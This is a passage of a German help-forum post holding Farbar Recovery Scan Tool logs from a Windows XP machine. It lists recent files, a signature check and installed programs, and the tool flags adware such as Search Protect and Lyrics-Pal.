2014-06-15 01:19 - 2014-06-14 22:35 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-06-15 00:34 - 2014-06-15 00:34 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2922229$
2014-06-15 00:34 - 2014-04-14 06:02 - 00018384 _____ () C:\WINDOWS\KB2922229.log
2014-06-15 00:34 - 2007-07-24 19:54 - 01891134 _____ () C:\WINDOWS\FaxSetup.log
2014-06-15 00:34 - 2007-07-24 19:54 - 01876852 _____ () C:\WINDOWS\iis6.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00910305 _____ () C:\WINDOWS\ocgen.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00869375 _____ () C:\WINDOWS\tsoc.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00582558 _____ () C:\WINDOWS\msmqinst.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00524933 _____ () C:\WINDOWS\comsetup.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00331696 _____ () C:\WINDOWS\netfxocm.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00315713 _____ () C:\WINDOWS\ntdtcsetup.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00131896 _____ () C:\WINDOWS\MedCtrOC.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00096256 _____ () C:\WINDOWS\tabletoc.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00094651 _____ () C:\WINDOWS\msgsocm.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00085178 _____ () C:\WINDOWS\ocmsn.log
2014-06-15 00:34 - 2007-07-24 19:54 - 00001374 _____ () C:\WINDOWS\imsins.log
2014-06-15 00:33 - 2007-07-25 06:18 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Microsoft Help
2014-06-15 00:32 - 2014-06-15 00:27 - 00006557 _____ () C:\WINDOWS\KB2964358-IE8.log
2014-06-15 00:32 - 2007-07-24 19:54 - 00001374 _____ () C:\WINDOWS\imsins.BAK
2014-06-15 00:32 - 2007-07-24 19:15 - 00243058 _____ () C:\WINDOWS\updspapi.log
2014-06-15 00:31 - 2012-02-15 01:26 - 00000000 ____D () C:\WINDOWS\ie8updates
2014-06-15 00:27 - 2014-06-15 00:27 - 00000000 ____D () C:\Programme\Gemeinsame Dateien\DESIGNER
2014-06-15 00:25 - 2013-07-15 21:47 - 00000000 ____D () C:\WINDOWS\system32\MRT
2014-06-14 22:47 - 2014-06-14 22:47 - 00001941 _____ () C:\Dokumente und Einstellungen\Username\Desktop\Sicherer Zahlungsverkehr.lnk
2014-06-14 22:27 - 2014-03-23 17:44 - 00000000 ____D () C:\Programme\Opera
2014-06-14 22:23 - 2014-06-14 22:23 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Kaspersky Internet Security
2014-06-14 22:22 - 2014-06-14 22:23 - 00000847 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Kaspersky Internet Security.lnk
2014-06-14 22:22 - 2007-07-24 19:53 - 00604898 _____ () C:\WINDOWS\setupapi.log
2014-06-14 22:21 - 2014-06-14 22:21 - 00000000 ____D () C:\Programme\Kaspersky Lab
2014-06-14 22:17 - 2014-03-23 17:38 - 00000220 _____ () C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP – Monatliche Benachrichtigung.job
2014-06-07 23:29 - 2014-03-23 17:48 - 00000000 ____D () C:\Programme\SearchProtect
2014-06-01 17:18 - 2012-02-14 23:43 - 92708840 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2014-05-31 19:49 - 2007-07-24 19:54 - 01184696 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-05-31 09:55 - 2007-07-24 19:53 - 00219064 _____ () C:\WINDOWS\setupact.log
2014-05-28 16:38 - 2014-06-14 22:21 - 00576096 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klif.sys
2014-05-28 16:38 - 2014-06-14 22:21 - 00093792 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klflt.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00144992 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\kneps.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00135776 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\kl1.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00024672 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klmouflt.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00024672 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klkbdflt.sys
2014-05-26 21:36 - 2014-03-19 21:41 - 00000022 _____ () C:\Dokumente und Einstellungen\Username\Desktop\fragen_bgv.txt
2014-05-25 09:32 - 2013-02-24 16:31 - 00000000 ____D () C:\HDW40_TMP

Some content of TEMP:
====================
C:\Dokumente und Einstellungen\Username\Lokale Einstellungen\Temp\NOSEventMessages.dll
C:\Dokumente und Einstellungen\Username\Lokale Einstellungen\Temp\SPSetup.exe


==================== Bamital & volsnap Check =================

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================
         
--- --- ---


Und noch Addition.txt:

Code:
ATTFilter
Additional scan result of Farbar Recovery Scan Tool (x86) Version:12-06-2014 02
Ran by Username at 2014-06-15 13:13:14
Running from C:\Dokumente und Einstellungen\Username\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: Kaspersky Internet Security (Disabled - Up to date) {2C4D4BC6-0793-4956-A9F9-E252435469C0}
FW: Kaspersky Internet Security (Disabled) {2C4D4BC6-0793-4956-A9F9-E252435469C0}

==================== Installed Programs ======================

2007 Microsoft Office system (HKLM\...\PROHYBRIDR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version:  - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe Flash Player 11 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 11.1.102.62 - Adobe Systems Incorporated)
Adobe Reader 7.0.8 - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-A70800000002}) (Version: 7.0.8 - Adobe Systems Incorporated)
Amazon MP3-Downloader 1.0.17 (HKCU\...\Amazon MP3-Downloader) (Version: 1.0.17 - Amazon Services LLC)
Amazon MP3-Downloader 1.0.17 (HKLM\...\Amazon MP3-Downloader) (Version: 1.0.17 - Amazon Services LLC)
Aquamarin Haushaltsbuch 2.9 (HKLM\...\{1E517C0C-8542-4F8C-DA23-98BCA13CD1F4}_is1) (Version:  - makasy.com)
Bundled software uninstaller (HKLM\...\bi_uninstaller) (Version:  - ) <==== ATTENTION
Business Card Reader (HKLM\...\{7B54248A-DC15-414B-A0ED-C5769FB151CB}) (Version: 1.00.0000 - Business Card Reader)
Conexant HD Audio (HKLM\...\CNXT_HDAUDIO) (Version: 3.40.0.52 - Conexant)
dm-Fotowelt (HKLM\...\dm-Fotowelt) (Version: 5.0.1 - CEWE COLOR AG u Co. OHG)
DVDStyler v2.4.3 (HKLM\...\DVDStyler_is1) (Version:  - )
EPSON Scan (HKLM\...\{0E0131B2-CF18-40D9-A331-60A3746C1204}) (Version:  - )
EtikettenAssistent 4.2 (HKLM\...\{9AEF64B1-79A5-4E2F-8FBC-4CA89ECD3595}) (Version: 4.2.1 - HERMA)
Free Studio version 2013 (HKLM\...\Free Studio_is1) (Version: 6.1.4.628 - DVDVideoSoft Ltd.)
FreeMind (HKLM\...\B991B020-2968-11D8-AF23-444553540000_is1) (Version: 0.9.0 - )
Geany 0.21 (HKLM\...\Geany) (Version: 0.21 - The Geany developer team)
Google Calendar Sync (HKLM\...\Google Calendar Sync) (Version:  - )
HD Writer AE 4.0 (HKLM\...\{DAC69A3A-89E6-4B70-B486-B974C2C95BE9}) (Version: 4.00.022.1031 - Panasonic Corporation)
High Definition Audio - KB888111 (HKLM\...\KB888111WXPSP2) (Version: 20040219.000000 - Microsoft Corporation)
Hotfix für Windows XP (KB2633952) (HKLM\...\KB2633952) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB2756822) (HKLM\...\KB2756822) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB2779562) (HKLM\...\KB2779562) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB932716-v2) (HKLM\...\KB932716-v2) (Version: 2 - Microsoft Corporation)
Hotfix für Windows XP (KB952287) (HKLM\...\KB952287) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB961118) (HKLM\...\KB961118) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB981793) (HKLM\...\KB981793) (Version: 1 - Microsoft Corporation)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
IrfanView (remove only) (HKLM\...\IrfanView) (Version: 4.32 - Irfan Skiljan)
Java 7 Update 9 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217009FF}) (Version: 7.0.90 - Oracle)
Java Auto Updater (Version: 2.1.9.0 - Sun Microsystems, Inc.) Hidden
Java(TM) 6 Update 31 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216031FF}) (Version: 6.0.310 - Oracle)
Kaspersky Internet Security (HKLM\...\InstallWIX_{6F6873E3-5C92-4049-B511-231A138DD090}) (Version: 14.0.0.4651 - Kaspersky Lab)
Kaspersky Internet Security (Version: 14.0.0.4651 - Kaspersky Lab) Hidden
Launch Manager V1.4.6 (HKLM\...\{D0846526-66DD-4DC9-A02C-98F9A2806812}) (Version: 1.4.6 - Wistron Corp.)
Lyrics-Pal (HKLM\...\lrcspal@lyricspal.co) (Version:  - LyricsPal Soft. LTD) <==== ATTENTION
MAGIX Slideshow Maker 2 (HKLM\...\MAGIX_MSI_Slideshow_Maker_2) (Version: 2.0.0.8 - MAGIX AG)
MAGIX Slideshow Maker 2 (Version: 2.0.0.8 - MAGIX AG) Hidden
Malwarebytes Anti-Malware Version 1.75.0.1300 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
MFC RunTime files (Version: 1.0.0 - Extensoft) Hidden
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 1.1 German Language Pack (HKLM\...\{E78BFA60-5393-4C38-82AB-E8019E464EB4}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Kernel-Mode Driver Framework 1.0 (Version:  - Microsoft Corporation) Hidden
Microsoft Kernel-Mode Driver Framework Feature Pack 1.9 (Version:  - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Hybrid 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Software Update for Web Folders  (German) 12 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft_VC100_CRT_SP1_x86 (Version: 10.0.40219.1 - Nokia) Hidden
ML-1200 Series (HKLM\...\{8C19F391-A225-4F32-8681-EDB8AFE6E436}) (Version:  - )
Mozilla Firefox 10.0.2 (x86 de) (HKLM\...\Mozilla Firefox 10.0.2 (x86 de)) (Version: 10.0.2 - Mozilla)
MSVC80_x86_v2 (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x86 (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 6.0 Parser (HKLM\...\{A43BF6A5-D5F0-4AAA-BF41-65995063EC44}) (Version: 6.10.1129.0 - Microsoft Corporation)
Müller Foto (HKLM\...\Müller Foto) (Version:  - )
MyPhoneExplorer (HKLM\...\MPE) (Version: 1.8.4 - F.J. Wechselberger)
Nero 7 Essentials (HKLM\...\{D34D82E0-4600-407B-9478-8506C1DD1031}) (Version: 7.02.3307 - Nero AG)
NimoFilm2.0 (HKLM\...\{07397706-FA6E-43EC-AF96-C2233FB4F896}) (Version: 2.00.02 - Mysher)
Nokia Connectivity Cable Driver (HKLM\...\{6FE12C01-2FBC-42E2-AEB9-4CA2238C462F}) (Version: 7.1.101.0 - Nokia)
Nokia Suite (HKLM\...\Nokia Suite) (Version: 3.7.22.0 - Nokia)
Nokia Suite (Version: 3.7.22.0 - Nokia) Hidden
OnlineFotoservice (HKLM\...\OnlineFotoservice) (Version: 5.0.1 - CEWE COLOR AG u Co. OHG)
Open Studio 1.0 (HKLM\...\Maguma Open Studio_is1) (Version:  - Maguma)
Opera Stable 22.0.1471.50 (HKLM\...\Opera 22.0.1471.50) (Version: 22.0.1471.50 - Opera Software ASA)
PC Connectivity Solution (HKLM\...\{6B722793-E77B-41F5-BAB3-6C9832274E75}) (Version: 12.0.76.0 - Nokia)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.3.2 - Frank Heindörfer, Philip Chinery)
Search Protect (HKLM\...\SearchProtect) (Version: 2.13.3.38 - Client Connect LTD) <==== ATTENTION
Shape Collage (HKLM\...\ShapeCollage) (Version:  - Shape Collage Inc.)
Shared Add-in Extensibility Update for Microsoft .NET Framework 2.0 (KB908002) (HKLM\...\{09959E11-AD5D-408E-96AF-E3346954D6B8}) (Version: 1.0.0 - Microsoft)
Shared Add-in Support Update for Microsoft .NET Framework 2.0 (KB908002) (HKLM\...\{64F3B15C-24C7-4B2B-9B72-65CCBBD7F06B}) (Version: 1.0.0 - Microsoft)
Sicherheitsupdate für Microsoft Windows (KB2564958) (HKLM\...\KB2564958) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Step by Step Interactive Training (KB898458) (HKLM\...\KB898458) (Version: 20050502.101010 - Microsoft Corporation)
Sicherheitsupdate für Step by Step Interactive Training (KB923723) (HKLM\...\KB923723) (Version: 20050502.101010 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2510531) (HKLM\...\KB2510531-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2544521) (HKLM\...\KB2544521-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2618444) (HKLM\...\KB2618444-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2647516) (HKLM\...\KB2647516-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2675157) (HKLM\...\KB2675157-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2699988) (HKLM\...\KB2699988-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2722913) (HKLM\...\KB2722913-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2744842) (HKLM\...\KB2744842-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2761465) (HKLM\...\KB2761465-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2792100) (HKLM\...\KB2792100-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2797052) (HKLM\...\KB2797052-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2799329) (HKLM\...\KB2799329-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2809289) (HKLM\...\KB2809289-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2817183) (HKLM\...\KB2817183-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2846071) (HKLM\...\KB2846071-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2862772) (HKLM\...\KB2862772-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2898785) (HKLM\...\KB2898785-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2909210) (HKLM\...\KB2909210-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2936068) (HKLM\...\KB2936068-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2964358) (HKLM\...\KB2964358-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB982381) (HKLM\...\KB982381-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB2378111) (HKLM\...\KB2378111_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB2834904) (HKLM\...\KB2834904_WM11) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB2834904-v2) (HKLM\...\KB2834904-v2_WM11) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB911564) (HKLM\...\KB911564) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB952069) (HKLM\...\KB952069_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB954155) (HKLM\...\KB954155_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB973540) (HKLM\...\KB973540_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB973540) (HKLM\...\KB973540_WM9L) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB975558) (HKLM\...\KB975558_WM8) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB978695) (HKLM\...\KB978695_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB979402) (HKLM\...\KB979402_WM9L) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player 9 (KB911565) (HKLM\...\KB911565) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player 9 (KB917734) (HKLM\...\KB917734_WMP9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2079403) (HKLM\...\KB2079403) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2115168) (HKLM\...\KB2115168) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2229593) (HKLM\...\KB2229593) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2296011) (HKLM\...\KB2296011) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2347290) (HKLM\...\KB2347290) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2360937) (HKLM\...\KB2360937) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2387149) (HKLM\...\KB2387149) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2393802) (HKLM\...\KB2393802) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2412687) (HKLM\...\KB2412687) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2419632) (HKLM\...\KB2419632) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2423089) (HKLM\...\KB2423089) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2440591) (HKLM\...\KB2440591) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2443105) (HKLM\...\KB2443105) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2476490) (HKLM\...\KB2476490) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2478960) (HKLM\...\KB2478960) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2478971) (HKLM\...\KB2478971) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2479943) (HKLM\...\KB2479943) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2481109) (HKLM\...\KB2481109) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2483185) (HKLM\...\KB2483185) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2485663) (HKLM\...\KB2485663) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2506212) (HKLM\...\KB2506212) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2507618) (HKLM\...\KB2507618) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2507938) (HKLM\...\KB2507938) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2508429) (HKLM\...\KB2508429) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2509553) (HKLM\...\KB2509553) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2510581) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB2535512) (HKLM\...\KB2535512) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2536276-v2) (HKLM\...\KB2536276-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2544521) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB2544893-v2) (HKLM\...\KB2544893-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2566454) (HKLM\...\KB2566454) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2570222) (HKLM\...\KB2570222) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2570947) (HKLM\...\KB2570947) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2584146) (HKLM\...\KB2584146) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2585542) (HKLM\...\KB2585542) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2592799) (HKLM\...\KB2592799) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2598479) (HKLM\...\KB2598479) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2603381) (HKLM\...\KB2603381) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2618451) (HKLM\...\KB2618451) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2619339) (HKLM\...\KB2619339) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2620712) (HKLM\...\KB2620712) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2621440) (HKLM\...\KB2621440) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2624667) (HKLM\...\KB2624667) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2631813) (HKLM\...\KB2631813) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2633171) (HKLM\...\KB2633171) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2641653) (HKLM\...\KB2641653) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2646524) (HKLM\...\KB2646524) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2647516) (HKLM\...\KB2647516) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2647518) (HKLM\...\KB2647518) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2653956) (HKLM\...\KB2653956) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2655992) (HKLM\...\KB2655992) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2659262) (HKLM\...\KB2659262) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2660465) (HKLM\...\KB2660465) (Version: 1 - Microsoft Corporation)
